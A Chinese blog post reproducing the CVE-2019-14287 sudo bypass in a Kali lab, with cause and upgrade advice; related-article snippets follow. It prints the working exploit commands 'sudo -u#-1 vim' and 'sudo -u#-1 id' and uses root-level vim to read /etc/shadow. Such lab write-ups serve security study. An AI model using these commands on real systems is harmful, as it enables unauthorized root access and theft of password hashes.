CVE-2019-14287:sudo 权限绕过漏洞(复现过程)

最新推荐文章于 2022-03-29 19:23:00 发布
最新推荐文章于 2022-03-29 19:23:00 发布
阅读量678 收藏
点赞数
分类专栏: 权限提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/102586497
版权

实验环境:

kali

影响范围:

sudo 1.8.28 之前的所有版本

复现过程

查询下sudo的版本

sudo -V

创建用户

useradd test 

passwd test

编辑下sudoers文件

 

这里添加了

test    ALL=(ALL, !root) /usr/bin/vim

这里表示 test 可以 任意主机上   任何用户    但这个用户不能属于root组    执行vim命令

这里介绍下字段含义

授权用户/组 主机=[(切换到哪些用户或组)][是否需要输入密码验证] 命令1,命令2

第一个字段表示:

授权用户/组         不以%开头的,代表“将要授权的用户”     以%开头的表示“将要授权的组”

第二个字段表示:

允许登录的主机

第三个字段表示:

可以切换到的用户或者组,省略表示切换到root。   如果不省略需要用括号表示   (用户:组)

第四个字段表示:

若添加NOPASSWD表示不需要输入密码,如果省略则表示需要输入密码

第五个字段表示:

可以运行的命令

我们用test用户登录下Kali,并尝试读取shadow文件

 

 

然后我们输入

sudo -u#-1 vim

或者

sudo -u#4294967295 vim

进入到vim

在命令模式下尝试读取/etc/shadow文件

成功读取,同样也可以用vim执行其他的命令(以root身份)

总结OR预防:

1.之所以会产生这个漏洞,是因为将用户 ID 转换为用户名的函数会将 -1(或无效等效的 4294967295)误认为是 0,而这正好是 root 用户 User ID

2.请将 sudo 升级到 1.8.28 最新版本,该漏洞会影响 1.8.28 之前的所有版本。

大方子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-14287(sudo提权)
墨痕诉清风的博客
06-22 644
复现CVE-2019-14287漏洞 原理:Sudo的全称是"superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下,以其它用户的权限运行应用程序或命令,通常是以root用户身份运行命令,以减少root用户的登录和管理时间,同时提高安全性,当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo命令以root身份执行命令. 个人理解:(直白点讲就是,如果你入侵了他人的主机,可以利用该漏洞,进行权限升级,不用切换root,因为切换root
CVE-2019-14287sudo 权限提升漏洞
冠霖L的博客
11-02 579
0x00 漏洞介绍 sudo本地权限提升漏洞CVE-2019-14287),是由于sudo配置文件配置不当造成的,此漏洞可以使普通用户绕过限制以root身份执行命令 0x01 影响版本 sudo < 1.8.28 0x02 sudo作用 sudo是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性 0x03 ...
CVE-2019-14287 linux sudo root 权限绕过漏洞复现
weixin_42433054的博客
10-16 1235
CVE-2019-14287 linux sudo root 权限绕过漏洞复现 1、准备工具,kali linux,或者任何版本的linux,查看sudo版本 root@kali:~# sudo -V Sudo version 1.8.21p2 明显该版本低于1.8.28。可以进行漏洞利用。 2、创建test用户,并分配密码 root@kali:/etc# useradd test ...
CVE-2019-14287sudo权限绕过漏洞
Sulli的博客
10-18 241
实验环境 Kali 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先看一下自身Kali的sudo版本,命令:sudo -V 符合条件,接下来需要新建一个test用户,命令:useradd test passwd test 然后vi进入sudoers,命令:vi /etc/sudoers 在root ALL=(ALL:ALL) ALL下添加test用户的配置:test ALL=(AL...
CVE-2019-14287:sudo 权限绕过漏洞复现
weixin_44215027的博客
10-18 310
CVE-2019-14287:sudo 权限绕过漏洞复现 参考:Ms08067安全实验室 实验环境 kali win10 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先,检查sudo的版本: 之后创建一个新用户: useradd test passwd test 然后,切换用户为test su test 在/etc/sudoers中插入 之后就可以通过vim来进行权限绕过。...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
CVE-2019-18634 感谢Apple Information Security的Joe Vennix查找错误。
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
最新发布
01-14
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
漏洞复现sudo提权漏洞CVE-2019-14287复现
Abc_Kimball的博客
01-31 810
一、简介 sudo:Linux系统命令,让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权限赋予该账号 • sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 二、漏洞复现过程 靶机:Ubuntu 18 x64系统 1.查看sudo版本,并创建test用户 1 sudo -V 查看sudo版本
CVE-2019-14287 sudo提权(复现
qq_46527139的博客
12-07 226
SUDO提权:CVE-2019-14287复现漏洞概述 sudo错误地处理了某些用户id。攻击者可能利用此漏洞以根用户身份执行任意命令。 漏洞危害等级:高危 影响版本 组件 版本 os linux2019.3 web server sudo1.8.27 基础环境 基础知识: sudo的作用: Linux是多用户多任务的操作系统,共享该系统的用户往往不只一个。 出于安全性考虑,有必要通过useradd创建一些非root用户, 只让它们拥有 不完全的权限;如有必要,再来提升权限
CVE-2019-14287 sudo 配置不当-权限提升漏洞预警
Vic的博客
10-16 251
报告编号:B6-2019-101501 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-10-15 0x00 漏洞背景 2019年10月14日, sudo 官方在发布了CVE-2019-14287漏洞预警。 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户权限控制/切换程序。允许管理员控制服务器下用户...
linux 漏洞 网站,linux sudo root 权限绕过漏洞(CVE-2019-14287)
weixin_39630498的博客
05-14 225
漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止使用的...
03 - CVE-2019-14287漏洞复现
weixin_43586169的博客
03-29 1088
一个简单的Linux系统的CVE漏洞
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
YJJYXM的博客
10-31 473
漏洞描述 2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。 此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。 具有足够sudo权限的用户可以使用它来运行Runas规范明确禁止...
linux 漏洞CVE-2019-14287CVE-2021-4034
任雪飘的博客
02-26 4899
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
Linux sudo权限绕过漏洞详解
sev777en的博客
10-15 3722
Linux sudo权限绕过漏洞详解 难得提起兴致写一篇软文,对于新曝光的Linux sudo权限绕过漏洞CVE-2019-14287做了一些研究, 各大平台都已经把核心东西亮出来了,但是目前没有发现说的特别完整的,经过一番摸索,总算 弄清楚了。 关于sudo的定义就不细说了,网上随便搜搜一大堆,这里直接进入正题。 本漏洞存在于sudo 1.8.28之前的版本,随便打开个虚拟机看看当前版本: 版...
sudo提权漏洞(CVE-2019-14287)
SoulCat
10-16 680
sudo权限绕过漏洞,附payload(CVE-2019-14287) 希望你别像风在我这里掀起了万般波澜却又跟云去了远方 漏洞概述: sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户 ID 转换为用户名的函数,会将 -1(或无效等效的 4294967295)误认为 0,而这正好是 root 用户的 ID 。 漏洞...
linux sudo提权漏洞,linux CVE-2019-14287 Sudo提权漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo提权漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值